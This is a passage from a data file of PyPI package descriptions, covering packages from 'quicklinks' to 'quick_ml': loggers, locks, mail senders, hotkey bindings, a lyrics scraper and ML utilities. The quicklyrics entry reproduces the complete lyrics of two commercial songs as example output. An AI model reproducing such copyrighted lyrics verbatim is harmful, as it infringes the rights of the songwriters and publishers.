(SeeLICENSEfor more information)"} +{"package": "quicklinks", "pacakge-description": "QuicklinksQuicklinks is a short command-line script that allows you to quickly switch to a pre-configured link.On macOS, this would be the same thing as doing the following:ql google->open https://google.comRequirementsThe only requirement for this application is Python 3Usage and InstallationRun the following script:pipinstallquicklinksCreate a.quicklinksfile in your user root:touch~/.quicklinksPopulate the.quicklinksfile like the following:{your-link-key}:{your-link-value}Example:google:https://google.com\nwiki:https://wikipedia.comRun the programqlwikiAnd you will be redirected to your browser of choice, opening your linkExperimental new features!Try out the browser extensions with Quicklinks server -DocumentationContributingFork this code and open a PR, all code is welcome as long as it follows the code of conduct!To run the application locally, navigate tocli/and run the commandpython ./quicklinks.pyCreditsQuicklinks was inspired by my use ofalias ql=\"open\"as well as the very coolGoLinks, check them out if you want the same thing as quicklinks but in your browser itself!"} +{"package": "quicklite", "pacakge-description": "python-dbLightweight database for Python, with a simple API and a simple file format.\nIt is not meant to be a full-featured database, but rather a simple way to store data in a file.\nIt's written in Python, and is compatible with Python 3.6 and above.FeaturesSimple APIColorful outputEasy to useCLI interfaceOpen sourceDocumentationThe documentation is available atnot yet availableInstallationYou can install python-db using pip:pip install python-dbUsageTo use python-db, you need to import it:from python_db import Database"} +{"package": "quicklock", "pacakge-description": "A simple Python resource lock to ensure only one process at a time is\noperating with a particular resource.Singleton UsageSingleton creates a file containing process information to ensure that\nthe process that created the lock is still alive. The default location\nis in the.lockdirectory in the current working directory. If this\ndirectory does not exist,singletonwill create it automatically.Simple usage:fromquicklockimportsingletonsingleton('my-process')# This will ensure that only one of these is running at once# The lock is released when the process that created the lock# exits (successfully or quits unexpectedly)# Intensive processing hereSpecifying the lock directory:fromquicklockimportsingletonsingleton('my-process',dirname='/var/lock')# Now all lock files will be written to# /var/lock instead# Intensive processing hereContributingPlease feel free to create issues and submit pull requests. 
I want to\nkeep this library as a simple collection of useful locking-related\nutilities.LicenseThe license is MIT, see the attachedLICENSEfile for more\ninformation."} +{"package": "quicklock3", "pacakge-description": "No description available on PyPI."} +{"package": "quicklog", "pacakge-description": "QuickLog is a small logging utility."} +{"package": "quick-log", "pacakge-description": "it's so easy to use"} +{"package": "quick-logger", "pacakge-description": "quick_loggerA simple interface for the standard Python logging library.AboutThis is a very simple package designed to setup a logger in one line and allow logging to it with ease.NoteI wrote this package when I was still in school. It's really no easier than just usinglogger..However, theinit_loggermethod may still be of some use. I've updated it such thatmlogcan now\nbe dispatched with level:from quick_logger import mlog\n# Previously any level beyond info:\nmlog(\"Here's a debug message.\", \"debug\")\n# Now, can use the same idiom as `logger.`:\nmlog.debug(\"Here's a debug message.\")Note that the original syntax is still backward-compatible, on the offchace anything out there uses this.Ultimately, this package isverysimple, you probably just want to use the base Python logging library.InstallationUse pip to install.python -m pip install quick_loggerUsageUseinit_loggerto create a log file, andmlogto add a log entry.Quick Startinit_loggerfromquick_loggerimportinit_logger,mloginit_logger('/path/to/file.log')By default, the log file will be set tologging.INFO.mlog# By default logs are set to \"info\"mlog(\"Logged something!\")# Invoke by levelmlog.error(\"Something went wrong!\")It's that easy!\"Advanced\" SetupYou can set afewoptions when you useinit_logger.level: Defaults toinfo, acceptscritical,error,warning,info,debug,notset.fmt: Defaults to'%(asctime)s:: %(levelname)s:: %(message)s'. Seelogging.Formatterfor details on how to set aFormatterstring.datefmt: Defaults to'%Y-%m-%d %H:%M:%S'. Seestrftime reference.fromquick_loggerimportinit_logger# Log file set to debuginit_logger('/path/to/file.log',level='debug')...# Log file with fmt that includes module.fmt='%(asctime)s::%(module)s::%(message)s'# or log file with fmt that just has messages.fmt='%(message)s'init_logger('/path/to/file.log',fmt=fmt)...# Omit date, just include the time.init_logger('/path/to/file.log',datefmt='%H:%M:%S')Issues/SuggestionsPlease make any suggestions or issues on the Github page. Note that this package is meant to be simple, so suggestions should keep that in mind.LicenseThis project is licensed under the MIT License. Please see the LICENSE.md file for details."} +{"package": "quicklogging", "pacakge-description": "My logging helper libraryQuicklogging is intended for 2 purposes:shrink the boilerplate I need before I can log something by a few bits,without changing the body of source code, change quick and dirtyprint()\u2019ing scripts into\nenterprise class software that logs.What quicklogging doesQuicklogging provides you with handy loggers named after the current module.importquickloggingmy_logger=quicklogging.get_logger()This allows for silencing or raising the logging level for a specific part or a\nwhole hierarchy of (sub-)packages (ie. folders, in Python\u2019s slang).Quicklogging can handle legacy calls toprint(). 
This means that the working code can stay\nas-is and still get loggedimportquicklogging# Catches prints in the current modulequicklogging.catch_prints()# Catches prints everywhere in the Python processquicklogging.catch_prints(catch_all=True)# -> does not print to stdout anymore, but is logged.print(\"hello world\")What quicklogging does NOTQuicklogging does not configure the logging formatting or output as this would\nnot save any line; here is a basic example for general purpose code:Quick\nsurvival guide with the logging module.Quicklogging qualityQuicklogging is covered by a test suite and has been working for years for me, but I wouldn\u2019t promise there is no bug.I have tried documenting the code but would welcome proofreading; the API may change after discussion."} +{"package": "quicklogs", "pacakge-description": "Easily create and configure Python loggers from single function call, optionally using environment variable instead of function arguments.Installpip install quicklogsUsageThere is one function:get_loggerfromquicklogsimportget_loggerSeearguments and docs"} +{"package": "quicklook", "pacakge-description": "quicklookAn easy way to view numpy arrays.Here are thedocs"} +{"package": "quicklooktimeseries", "pacakge-description": "No description available on PyPI."} +{"package": "quicklookts", "pacakge-description": "No description available on PyPI."} +{"package": "quicklookts07", "pacakge-description": "No description available on PyPI."} +{"package": "quicklookts08", "pacakge-description": "No description available on PyPI."} +{"package": "quicklooper", "pacakge-description": "Quick LooperA simple polling style loop, run in a separate thread.InstallationInstall from PyPI:pip install quicklooperHow to useMake a class that inherits from the Looper class, and override themainmethod with code to be run each loop. The loop period may be set by assigning a float value to the class variable_intervalor by passing theintervalkeyword arg to theLooper.__init__method.Override theon_start_upandon_shut_downmethods to add any code to be run before the first loop, and after the final loop whenstopis called.Example of a basic app which polls the/printfilesdirectory for new files to print:from quicklooper import Looper\n\n\nclass PrintMonitor(Looper):\n _interval = 10.0\n\n def __init__(self, directory: str):\n self.directory: str = directory\n self._printed_files: Set[str] = set()\n\n def on_start_up():\n self._printed_files = {file for file in os.listdir(self.directory)}\n\n def main():\n for file in os.listdir(self.directory):\n send_to_printer(file) # implementation not shown\n self._printed_files.add(file)\n\n\nif __name__ == '__main__':\n print_monitor = PrintMonitor('/printfiles')\n print_monitor.start()Whenprint_montitor.start()is called, the app runson_start_upmethod, and then callsmainevery\nten seconds to scan for new files to print.Callstopto exit the loop immediately."} +{"package": "quicklst", "pacakge-description": "QuicklstQuicklst ist a python library for reading .lst files produced by FAST ComTec's mpa system. 
It uses numba to accelerate\nthe reading of the file and supports block or chunk wise loading of large files.Limitations: Both MPA3 and MPA4A files are supported, but they need to be in binary form not in ASCII encoding, the real\ntime clock is not implemented either.Basic usage is demonstrated inexamples/Quickstart.ipynb."} +{"package": "quickly", "pacakge-description": "Homepage\u2022Development\u2022Download\u2022Documentation\u2022LicenseThequicklypython package is able to create and manipulate LilyPond music\ndocuments. LilyPond documents often use the.lyextension, hence the name.It is currently in an early development stage, but slated to become the\nsuccessor of thepython-lypackage. Like python-ly, it provides tools to\nmanipulateLilyPondmusic documents, but instead of using the lexer in\npython-ly, which is very difficult to maintain, it uses the newparcepackage for parsingLilyPondfiles.ly.domandly.musicare superseded byquickly.domwhich provides a\nway to both build a LilyPond source file from scratch (likely.dom) and\nmanipulate an existing document (likely.music). Most of the functionality\nthat in python-ly is implemented at the token level, like transposing and\nrhythm manipulations, now works on the musical representation provided byquickly.dom, which looks a lot likely.music.This module is written and maintained by Wilbert Berendsen, and will, as it\ngrows, also contain (adapted) code from python-ly that was contributed by\nothers. Python 3.6 and higher is supported. Besides Python itself the most\nrecent version of theparcemodule is needed. Testing is done by runningpytest-3in the root directory.The documentation reflects which parts are already working :-) Enjoy!"} +{"package": "quicklyrics", "pacakge-description": "Powerful Library To Search Music LyricsInstallationQuickLyrics can be installed using pip from PyPI or from GitHubvia PyPI using pippipinstall-Uquicklyricsvia GitHub using pip+gitpipinstall-Ugit+https://github.com/rishabh3354/QuickLyricsUsageTo use QuickLyrics is easy, but let's see some examples:Example #1fromquicklyrics.lyricsimportSearchBySongres=SearchBySong(\"faded\").results()The above command will return the following:[{\"song\":\"faded\",\"artist\":\"alanwalker\",\"web_url\":\"https://www.azlyrics.com/lyrics/alanwalker/faded.html\"},{\"song\":\"fadedonme\",\"artist\":\"alexanderludwig\",\"web_url\":\"https://www.azlyrics.com/lyrics/alexanderludwig/fadedonme.html\"},{\"song\":\"fadedinmylastsong\",\"artist\":\"nct\",\"web_url\":\"https://www.azlyrics.com/lyrics/nct/fadedinmylastsong.html\"},{\"song\":\"fadedou\",\"artist\":\"askingalexandria\",\"web_url\":\"https://www.azlyrics.com/lyrics/askingalexandria/fadedout.html\"},{\"song\":\"faded\",\"artist\":\"bushidozho\",\"web_url\":\"https://www.azlyrics.com/lyrics/bushidozho/faded.html\"}]Example #2fromquicklyrics.lyricsimportSearchArtistsres=SearchBySong().results_by_url(\"https://www.azlyrics.com/lyrics/alanwalker/faded.html\")# Note: You can get lyrics web url from example #4The above command will return the following:{\"status\":true,\"lyrics\":\"\\n\\r\\nYou were the shadow to my light\\nDid you feel us?\\nAnother star\\nYou fade away\\nAfraid our aim is out of sight\\nWanna see us\\nAlight\\n\\nWhere are you now?\\nWhere are you now?\\nWhere are you now?\\nWas it all in my fantasy?\\nWhere are you now?\\nWere you only imaginary?\\n\\nWhere are you now?\\nAtlantis\\nUnder the sea\\nUnder the sea\\nWhere are you now?\\nAnother dream\\nThe monster's running wild inside of me\\nI'm faded\\nI'm faded\\nSo 
lost, I'm faded\\nI'm faded\\nSo lost, I'm faded\\n\\nThese shallow waters never met what I needed\\nI'm letting go a deeper dive\\nEternal silence of the sea, I'm breathing\\nAlive\\n\\nWhere are you now?\\nWhere are you now?\\nUnder the bright but faded lights\\nYou've set my heart on fire\\nWhere are you now?\\nWhere are you now?\\n\\nWhere are you now?\\nAtlantis\\nUnder the sea\\nUnder the sea\\nWhere are you now?\\nAnother dream\\nThe monster's running wild inside of me\\nI'm faded\\nI'm faded\\nSo lost, I'm faded\\nI'm faded\\nSo lost, I'm faded\\n\"}Example #3fromquicklyrics.lyricsimportSearchArtistsres=SearchArtists(\"R\").results()The above command will return the following:[\"R3HAB\",\"R5\",\"Ra\",\"Rabbitt, Eddie\",\"RAC\",\"Racal, Maris\",\"Rachael Yamagata\",\"Rachel Chinouriri\",\"Rachel Crow\",\"Rachel Farley\",\"Rachel Grae\",\"Rachelle Ann Go\",\"Rachel Platten\",\"Rachel Stevens\",\"Rachel Taylor\",\"Rachel Wammack\",\"Raconteurs, The\",\"Racoon\",\"Radiant Children\",\"RADICAL\"]Example #4fromquicklyrics.lyricsimportSearchByArtistsres=SearchByArtists(\"Rihanna\").results()The above command will return the following:{\"artist\":\"Rihanna\",\"albums\":[{\"album_name\":\"album: \\\"Music Of The Sun\\\" (2005)\",\"songs\":[\"Pon De Replay\",\"Here I Go Again\",\"If It's Lovin' That You Want\",\"You Don't Love Me (No, No, No)\",\"That La, La, La\",\"The Last Time\",\"Willing To Wait\",\"Music Of The Sun\",\"Let Me\",\"Rush\",\"There's A Thug In My Life\",\"Now I Know\",\"Pon De Replay (Remix)\"]},{\"album_name\":\"album: \\\"A Girl Like Me\\\" (2006)\",\"songs\":[\"SOS\",\"Kisses Don't Lie\",\"Unfaithful\",\"We Ride\",\"Dem Haters\",\"Final Goodbye\",\"Break It Off\",\"Crazy Little Thing Called Love\",\"Selfish Girl\",\"P.S. (I'm Still Not Over You)\",\"A Girl Like Me\",\"A Million Miles Away\",\"If It's Lovin' That You Want Pt. 
2\",\"Who Ya Gonna Run To?(Deluxe Edition Bonus Track)\",\"Coulda Been The One(Deluxe Edition Bonus Track)\",\"Should I?(Deluxe Edition Bonus Track)\",\"Hypnotized(Deluxe Edition Bonus Track)\"]},{\"album_name\":\"album: \\\"Good Girl Gone Bad\\\" (2007)\",\"songs\":[\"Umbrella\",\"Push Up On Me\",\"Don't Stop The Music\",\"Breakin' Dishes\",\"Shut Up And Drive\",\"Hate That I Love You\",\"Say It\",\"Sell Me Candy\",\"Lemme Get That\",\"Rehab\",\"Question Existing\",\"Good Girl Gone Bad\",\"Cry(Japanese Bonus Track)\",\"Haunted(Japanese Bonus Track)\",\"Disturbia(Good Girl Gone Bad: Reloaded)\",\"Take A Bow(Good Girl Gone Bad: Reloaded)\",\"If I Never See Your Face Again(Good Girl Gone Bad: Reloaded)\"]},{\"album_name\":\"album: \\\"Rated R\\\" (2009)\",\"songs\":[\"Mad House\",\"Wait Your Turn\",\"Hard\",\"Stupid In Love\",\"Rockstar 101\",\"Russian Roulette\",\"Fire Bomb\",\"Rude Boy\",\"Photographs\",\"G4L\",\"Te Amo\",\"Cold Case Love\",\"The Last Song\",\"Hole In My Head(Nokia Comes With Music Bonus Track)\"]}]}Example #5fromquicklyrics.lyricsimportSearchByArtistAndSongres=SearchByArtistAndSong(\"Rihanna\",\"Love The Way You Lie Part II\").results()The above command will return the following:{\"artist\":\"rihanna\",\"song\":\"lovethewayyouliepartii\",\"lyrics\":[\"\\n\\r\\nOn the first page of our story\\nThe future seemed so bright\\nThen this thing turned out so evil\\nI don't know why I'm still surprised\\nEven angels have their wicked schemes\\nAnd you take that to new extremes\\nBut you'll always be my hero\\nEven though you've lost your mind\\n\\nJust gonna stand there and watch me burn\\nWell, that's alright because I like the way it hurts\\nJust gonna stand there and hear me cry\\nWell, that's alright because I love the way you lie\\nI love the way you lie, oh\\nI love the way you lie\\n\\nNow there's gravel in our voices\\nGlass is shattered from the fight\\nIn this tug of war, you'll always win\\nEven when I'm right\\n'Cause you feed me fables from your head\\nWith violent words and empty threats\\nAnd it's sick that all these battles\\nAre what keeps me satisfied\\n\\nJust gonna stand there and watch me burn\\nWell, that's alright because I like the way it hurts\\nJust gonna stand there and hear me cry\\nWell, that's alright because I love the way you lie\\nI love the way you lie, oh\\nI love the way you lie, oh\\n\\nSo maybe I'm a masochist\\nI try to run, but I don't wanna ever leave\\n'Til the walls are going up\\nIn smoke with all our memories\\n\\nIt's morning, you wake, a sun ray hits your face\\nSmeared makeup as we lay in the wake of destruction (Shh)\\nHush baby, speak softly, tell me you're awfully sorry\\nThat you pushed me into the coffee table last night so I can push you off me\\nTry and touch me so I can scream at you not to touch me\\nRun out the room and I'll follow you like a lost puppy\\nBaby, without you, I'm nothing, I'm so lost, hug me\\nThen tell me how ugly I am, but that you'll always love me\\nThen after that, shove me, in the aftermath of the\\nDestructive path that we're on, two psychopaths, but we\\nKnow that no matter how many knives we put in each other's backs\\nThat we'll have each other's backs 'cause we're that lucky\\nTogether, we move mountains, let's not make mountains out of molehills\\nYou hit me twice, yeah, but who's counting?\\nI may have hit you three times, I'm starting to lose count\\nBut together, we'll live forever, we found the youth fountain\\nOur love is crazy, we're nuts, but I refused counseling\\nThis house is too huge, 
if you move out, I'll burn all two thousand\\nSquare feet of it to the ground, ain't shit you can do about it\\n'Cause with you, I'm in my fucking mind, without you, I'm out it\\n\\nJust gonna stand there and watch me burn\\nWell, that's alright because I like the way it hurts\\nJust gonna stand there and hear me cry\\nWell, that's alright because I love the way you lie\\nI love the way you lie\\nI love the way you lie\\nI love the way you lie\\nI love the way you lie\\n\",\"\"]}"} +{"package": "quickmacapp", "pacakge-description": "NoteThis is extremely rough and poorly documented at this point. While its\npublic API is quite small to avoidunduechurn, it may change quite\nrapidly and if you want to use this to ship an app you probably will want\nto contribute to it as well.Make it easier to write small applications for macOS in Python, using Twisted.To get a very basic status menu API:fromquickmacappimportmainpoint,Status,answer,quitfromtwisted.internet.deferimportDeferred@mainpoint()defapp(reactor):s=Status(\"\u2600\ufe0f \ud83d\udca3\")s.menu([(\"Do Something\",lambda:Deferred.fromCoroutine(answer(\"something\"))),(\"Quit\",quit)])app.runMain()Packaging this into a working app bundle is currently left as an exercise for\nthe reader.This was originally extracted fromhttps://github.com/glyph/Pomodouroboros/"} +{"package": "quickmachotkey", "pacakge-description": "This is a set of minimal Python bindings for the undocumented macOS framework\nAPIs that eventhe most modern, sandboxing-friendly shortcut-binding\nframeworksuse under the hood for actually binding global hotkeys.Unlike something full-featured like MASShortcut, this provides no configuration\nUI; you have to provide keyboard constants directly.Simple example:fromquickmachotkeyimportquickHotKey,maskfromquickmachotkey.constantsimportkVK_ANSI_X,cmdKey,controlKey,optionKey@quickHotKey(virtualKey=kVK_ANSI_X,modifierMask=mask(cmdKey,controlKey,optionKey))defhandler()->None:print(\"handled \u2318\u2303\u2325X\")if__name__==\"__main__\":fromAppKitimportNSApplication# type:ignore[import]fromPyObjCToolsimportAppHelper# type:ignore[import]print(\"type \u2318\u2303\u2325X with any application focused\")NSApplication.sharedApplication()AppHelper.runEventLoop()"} +{"package": "quickmail", "pacakge-description": "send email with one line using sslyou need a local_settings.py in the root of the virtualenv with this:# MAIL_CONFIG_DICT is required by for senderror_simple which is a function of the module quickmail# SMTP_SSL_HOST is a ssl enabled smtp host and SMTP_SSL_PORT is the port to use (usually 465)# MAIL_USER and MAIL_PASS refer to the email account to use to send error messages. MAIL_RECIPIENTS is a list of emails (strings) to be notified of errorsMAIL_CONFIG_DICT = {'SMTP_SSL_HOST': 'yourdomain.com','SMTP_SSL_PORT': 465,'MAIL_USER': 'you@yourdomain.com','MAIL_PASS': 'yourpass','MAIL_RECIPIENTS': ['you@yourdomain.com', friend@anotherdomain.com']}"} +{"package": "quick-mail", "pacakge-description": "Quick Mail CLIA command line interface to send mail without any hassle.Why this tool?Sending last minute mails using conventional tools can get annoying and tiresome. This CLI helps in such situation since it makes sending mail hassle-free and very quick. 
Use this tool to send mails quickly without leaving your terminal.InstallationInstall quick-mail from the Python Package Index (PyPi)$ pip install quick-mailOr manually from this repository.$ git clone https://github.com/avikumar15/quick-mail-cli\n\n* add line export PYTHONPATH=/path/to/project/quick-email-cli to ~/.bashrc *\n\n$ cd quick-mail-cli/\n\n* activate virtual environment *\n\n$ pip install -r requirements.txt\n$ pip install .Check installation by running$ quickmail --versionUsageTo use this:$ quickmail --helpusage: quickmail [-h] [-v] {clear,init,send,template} ...\n\nA command line interface to send mail without any hassle\n\npositional arguments:\n {clear,init,send,template}\n clear clear the body of message from local or even the token if\n --justdoit argument is added\n init initialise token and set your email id\n send send the mail\n template manage templates of mail body\n\noptional arguments:\n -h, --help show this help message and exit\n -v, --version print current cli versionCreate yourOAuth client IDand select app type as Desktop App and download the credentials.json file.Then run the init command to authenticate gmail, and generate token. This command is required to be run only once.$ quickmail init Now you are all set. Use the send command to send mail.$ quickmail send --helpusage: quickmail send [-h] -r RECEIVER -sub SUBJECT [-t TEMPLATE] [-b BODY]\n [-a ATTACHMENT] [-l]\n\nUse the send command to send mail. Body can be passed as an argument, or typed in\na nano shell. Use optional --lessgo command for sending mail without confirmation\n\noptional arguments:\n -h, --help show this help message and exit\n -r RECEIVER, --receiver RECEIVER\n receiver's email address, eg. '-r \"xyz@gmail.com\"'\n -sub SUBJECT, --subject SUBJECT\n email's subject, eg. '-sub \"XYZ submission\"'\n -t TEMPLATE, --template TEMPLATE\n template of email body, eg. '-t=\"assignment_template\"'\n -b BODY, --body BODY email's body, eg. '-b \"Message Body Comes Here\"'\n -a ATTACHMENT, --attachment ATTACHMENT\n email's attachment path, eg. '~/Desktop/XYZ_Endsem.pdf'\n -l, --lessgo skip confirmation before sending mailBody and attachments are optional arguments. Body can be either passed as an argument otherwise it can also be typed in the nano shell (Use -t argument to use a template body). Use the --lessgo (shorthand -l) to skip confirmation of mail, for quicker mail deliveries.To clear the cli storage, use the clear command. Use --justdoit (shorthand -j) to even remove the credential and token files from project directory, this extra argument would allow you to change your primary email address.$ quickmail clear --helpusage: quickmail clear [-h] [-j]\n\nUse the clear command to clear all email body that are saved in your home\ndirectories. Additionally, pass --justdoit to remove the credential files as well\n\noptional arguments:\n -h, --help show this help message and exit\n -j, --justdoit clear storage including the credentials and tokenTo manage templates use the template command.$ quickmail template --helpusage: quickmail template [-h] {add,listall,edit} ...\n\nmanage mail templates\n\npositional arguments:\n {add,listall,edit}\n add add a new template\n listall list all templates\n edit edit a particular template\n\noptional arguments:\n -h, --help show this help message and exitFollowing is a recording of the terminal session which records the usage ofquickmailfrom init command till send command.Improvements and BugsFound any bugs? 
Or have any suggestions, feel free to open an issue."} +{"package": "quick-mailer", "pacakge-description": "DescriptionThis Module help you to sendfast Email. \ud83c\udf38And you can attachimage, audio, and other files easily.The Module supportGmail And Microsoftright now, but in the nearly future will support other mail services.Installation:pip install quick-mailer-->> GitHub LinkUsage:Send MessagefrommailerimportMailermail=Mailer(email='someone@gmail.com',password='your_password')mail.send(receiver='someone@example.com',# Email From Any service Providerno_reply='noreplay@example.com',# Redirect receiver to another email when try to reply.subject='TEST',message='HI, This Message From Python :)')Parametersreceiver:EmailAddressasStringorList.[Required]cc:EmailAddressasStringorList.(CarbonCopy)[Optional]bcc:EmailAddressasStringorList.(BlindCarbonCopy)[Optional]sender_name:SetSendername.[Optional]receiver_name:Setreceivername.[Optional]no_reply:SetAnotherEmailToReply[Optional]subject:MessageTitle.[Optional]message:YourMessage.[Optional]image:ImageFileName.(ImagePath)[Optional]audio:AudioFileName.(AudioPath)[Optional]file:FileName.(AnyFilePath)[Optional]Check Send Status# Using (status) Attributeprint(mail.status)# Example For One Receiver:ifmail.status:passelse:pass# Note:# IF You Put List Emails Receivers# Variable Will Return Dictionary Results.# IF You Allowed Repeat# The Attribute Will provide Results List.Send Multi Filesmail.send(receiver='someone@example.com',# Email From Any service Providersubject='TEST',message='HI, This Message From Python :)',image='img.jpg',# Image File Pathaudio='sound.mp3',# Audio File Pathfile='file.zip')# Any File PathSettings Methodmail.settings(repeat=1,# To Repeat Sendingsleep=0,# To Sleep After Send Each Messageprovider=mail.GMAIL,# Set Maill Servicemulti=False)# Default False, If You Set True# Message Will Sent 4 Each Email Alone# Else Will Sent To All TogetherSend Multi Emails# One By One:mail.settings(multi=False)# In Same Message:mail.settings(multi=True)mail.send(receiver=['someone@example.com','someone1@example.com'],subject='TEST',message='HI, This Message From Python :)')Counter Variables# CC Receivers Countprint('CC count:',mail.count_cc)# BCC Receivers Countprint('BCC count:',mail.count_bcc)# Receivers Countprint('Receivers count:',mail.count_rec)# Messages Countprint('Messages count:',mail.count_msg)Example Functionfrommailerimportexampleexample()About Method# You Can Use (mail.about) Method for more info.mail.about()Changelogs2022.2.10 update:Fix issue #3 TypeError on python < 3.102022.2.2 update:Support Html MessageFix issue #1 TypeError on python < 3.10Follow Me on Instagram:@9_Tay. \ud83c\udf38Thank You :) \ud83c\udf38\ud83c\udf38"} +{"package": "quick-manage", "pacakge-description": "Quick IT Management ToolsThis is a set of lightweight IT management tools meant for small organizations and homelabs. It is meant to fall somewhere between the capabilities of bash scripts and ansible.The tools automate a handful of operations which I found myself having to repeatedly perform, but didn't have straightforward means of automation without jumping into much heavier and more complex solutions. 
The project is set up to provide a comfortable command line interface for manual and scripted use, while also being a fully usable Python 3 library.FeaturesI add these features as I have need of them, but suggestions and contributions are welcome:(All are in progress)Certificate checking and deploymentLocal hosts file managementLocal DNS static entry managementVyos wireguard managementDebuggingpipinstall--editable.Development InformationStartupFrom the command line, all persisted state is accessed through a singleton of theEnvironmentclass. This is retrieved from theEnvironment.default()method.During the first call toEnvironment.default()the environment is constructed. The configuration for theEnvironmentobject is provided by theQuickConfigclass. This in turn is constructed through theQuickConfig.default()static method, which attempts to load a configuration file from the default application configuration directory provided byclick.Object ConstructionThese mechanisms are messy and need to be streamlined once I have a better idea of all the things they need to do.Objects which provide functionality are constructed dynamically at runtime from stored configuration. TheEnvironmentobject has a field calledbuilderswhich is a simple dataclass that has twoIBuilderobjects, one for building context objects, and one for building key stores.AnIBuilderinstantiates objects at the request of callers. Types which the builder can produce must be registered using theregistermethod, which takes the name The default implementation of anIBuilderis theGenericBuilder(these might be able to be squashed into one later).Registering a type with the builder involves giving it a friendly string name for the type (this is the human-readable name used in configuration files), the type of the object to be built, and the type of the configuration object. Types which are built by a builder must have a class initializer which accepts an instance of the configuration object as the first argument.Configurations for objects are stored in the form of json/yaml dictionaries having three elements: (1) a stringname, (2) a stringtypewhich matches a string type name registered with the appropriate builder, and (3) aconfigdictionary that will be passed into the initializer of the configuration object. When something is going to be built, these three things are put into anEntityConfigobject which then gets given to the builder'sbuildmethod. It will first instantiate the configuration type usingdacite'sfrom_dictmethod on theconfigdictionary. Then it will instantiate the final object by passing this configuration object into the initializer for that class.All of this is basically a complicated way of managing dynamic configurations.HostsHosts are one of the main entities. A host represents a computer or something that acts like a computer. 
It has the following properties:A unique nameA text descriptionA list of client management mechanisms (ssh, api, etc)A set of type based configurations"} +{"package": "quickmaths", "pacakge-description": "No description available on PyPI."} +{"package": "quickmathsfunctions", "pacakge-description": "Python CI/CD with BuildkiteThis repository serves as a code container for the tutorial I wrote onBuildkite's blog.Blog link will be updated once the article is published.FeaturesSimple Utility functionsPublish documentation to Readthedocs.ioCI/CD with BuildkiteGetting StartedFollow these instructions to get the project up and running.# Clone the repogitclonehttps://github.com/ravgeetdhillon/buildkite-python-ci-cd# Change directory$cdbuildkite-python-ci-cd# Initialize virtual environment$python3-mvenvvenv# Install dependencies$pipinstallFor detailed instructions,read the blog.Tech StackPythonAuthorsRavgeet DhillonExtraYou are welcome to makeissues and feature requests.In case you get stuck somewhere, feel free to contact me viaMail."} +{"package": "quick-menu", "pacakge-description": "quick-menuThis is a simple package to create text menus for use in console applications.UsageA menu can be created quickly that can call a function with or without a value. An exit\nitem is automatically added to the menu.Create a Quick Menufromquick_menu.menuimportMenu,MenuItemdeffunc(val=1):print(\"func1: val =\",val)input(\"Press [Enter] to continue\")menu=Menu(\"Simple Menu\",menu_items=[MenuItem(\"1\",\"Func default\",action=func),MenuItem(\"2\",\"Func with val=4\",action=func,action_args={\"val\":4}),])menu.run()Output============== Simple Menu =============\n1: Func default\n2: Func with val=4\nX: Exit\n========================================\n>> 1\nfunc1: val = 1\nPress [Enter] to continue\n\n============== Simple Menu =============\n1: Func default\n2: Func with val=4\nX: Exit\n========================================\n>> 2\nfunc1: val = 4\nPress [Enter] to continueDocumentationThedocumentationis made withMaterial for MkDocsand is hosted byGitHub Pages.Installationpip install quick-menuLicensequick-menuis distributed under the terms of theMITlicense."} +{"package": "quickmin-step", "pacakge-description": "SEAMM QuickMin Plug-inA SEAMM plug-in for simple, quick minimizationFree software: BSD-3-ClauseDocumentation:https://molssi-seamm.github.io/quickmin_step/index.htmlCode:https://github.com/molssi-seamm/quickmin_stepFeaturesQuickMin provides quick, simple optimization of molecular structures using one of a\nnumber of forcefields. It is intended for small systems, with no more than about 300\natoms. Beyond that size it will be rather slow, but more importantly larger systems\ntypically have many local minima, often close to each other energetically, so the\nconcept of the minimum structure is not very useful.QuickMin usesOpenBabelfor the minimization. There are currently five forcefields\navailable:GAFF\u2013 the general AMBER force fieldMMFF94\u2013 the Merck molecular force fieldMMFF94s\u2013 the Merck molecular force field for energy minimizationGhemicalUFF\u2013 Universal force fieldThe first four have parameters for organic and biomolecular systems, while UFF attempts\nto cover the entire periodic table with reasonable accuracy. The more specialized\nforcefields tend to be more accurate, roughly in the order listed (though the two MMFF94\nare essentially similar). By default QuickMin will try each of the forcefields in the\norder given until it finds one that can handle the given molecule. 
You can specify the\nforcefield to use; however, if it does not have parameters for your molecule, QuickMin\nwill throw an error.AcknowledgementsThis package was created with themolssi-seamm/cookiecutter-seamm-plugintool, which\nis based on the excellentCookiecutter.Developed by the Molecular Sciences Software Institute (MolSSI), which receives funding\nfrom theNational Science Foundationunder award CHE-2136142.History2023.11.15 \u2013 Bugfix: structure handlingError putting the coordinates into a newly created configuration.2023.10.30 \u2013 Enhanced structure handling.Switched to standard handling of structures, which adds ability to name with the\nIUPAC name, InCHI, and InChIKey in addition to previous methods.2023.1.14 \u2013 Changed documentation to new style and theme.Switched the documentation to the MolSSI theme and di\u00e1taxis layout, though more work\nis needed.2022.11.7 \u2013 Internal ReleaseSwitching from LGTM code analysis to GitHub Actions using CodeQL, since LGTM is\nshutting down!2022.10.23 \u2013 Properties addedAdded a single property, \u2018total energy#QuickMin#\u2019, to store the final\nenergy in the database. Also added \u2018total energy\u2019 as a result for tables or\nvariables.2022.10.22 \u2013 Documentation!Got the documentation into reasonable shape.2022.10.20 \u2013 Initial Release!Provides quick minimization for smaller molecules, using OpenBabel. Probably\nreasonable for some few hundred atoms. Supports the following forcefields:GAFFMMFF94 & MMFF94s (which is optimized for minimization)GhemicalUFFThe default is the \u201cbest available\u201d forcefield, which tries them in the order given\nabove until it finds one that can handle the molecule."} +{"package": "quickml", "pacakge-description": "No description available on PyPI."} +{"package": "quick-ml", "pacakge-description": "quick_ml\u00a0\u00a0\u00a0\u00a0 :\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ML for everyoneOfficial Websitewww.quickml.infoquick_mlis a python package (pypi) which provides quick plug and plag prototypes to train Deep Learning Model(s) through optimized utilization of TPU computation power.Speed up your Deep Learning Experimentation Workflow by x20 times.No unncessary worrying about the details. Those have been taken care of by the library.Obtain results of Deep Learning Models on your dataset using minimal lines of code.Train Multiple Deep Learning Models in a go just by naming the model names. You need not to worry much about the internal working.Full control over the Deep Learning workflow & setting of parameters. All within a single or minimal function call(s).New Features!Rapidly train about 24 Deep Learning Pretrained Models in one session using TPUs.Quick & Easy TFRecords Dataset Maker. TFRecords expidite the training process. -Why quick_ml?Usual time taken to code & train a deep learning workflow for a single model is atleast 1.5 hrs to 2 hrs (given you are proficient in the field and you know what to code). Using quick_ml, you would be able to do this in less than 20 mins even if you are a beginner.Fast experimentation. That's it. Experimenting what works and what doesn't is tedious and tiresome.SpecificationsSupport forKaggle 